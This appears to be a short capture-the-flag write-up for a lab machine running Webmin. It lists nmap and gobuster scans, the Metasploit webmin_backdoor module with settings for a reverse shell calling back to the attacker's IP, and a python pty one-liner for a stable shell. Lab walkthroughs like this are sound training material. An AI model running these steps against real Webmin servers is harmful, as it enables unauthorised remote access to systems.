SOURCE
Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool.
Room link is here link
Task1
Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?
I'm going to start the challenge by scanning the ip with nmap as in every challenge.
10.10.38.68 -> source.thm
nmap -sV -sC -A source.thm
The output:
- Port 22 is for ssh.
- Port 10000 is the default port for webmin.
And the link would be:
https://10.10.38.68:10000
Unfortunately we don't know the username and password to ssh and webmin and I tried to search directories with gobuster, but nothing.
gobuster dir -u https://10.10.38.68:10000 -w /usr/share/wordlists/dirb/common.txt
The last option was to look for an exploit on Metasploit.
And yep, there are more vulnerabilities, and the exploit which I used is 5 “exploit/linux/http/webmin_backdoor” .
And now is need to set the LPORT, RHOSTS and ssl to true following these commands:
set RHOSTS 10.10.38.68 (Machine IP)
set LHOST 10.11.61.213 (YOUR IP)
set ssl true
And now, to run the exploit simply type run/exploit.
To have a stable shell run these followings commands:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/anyname.py
python /tmp/anyname.py
And boom!! We have a stable shell
All we need to do now is to find the flags.
Top comments (0)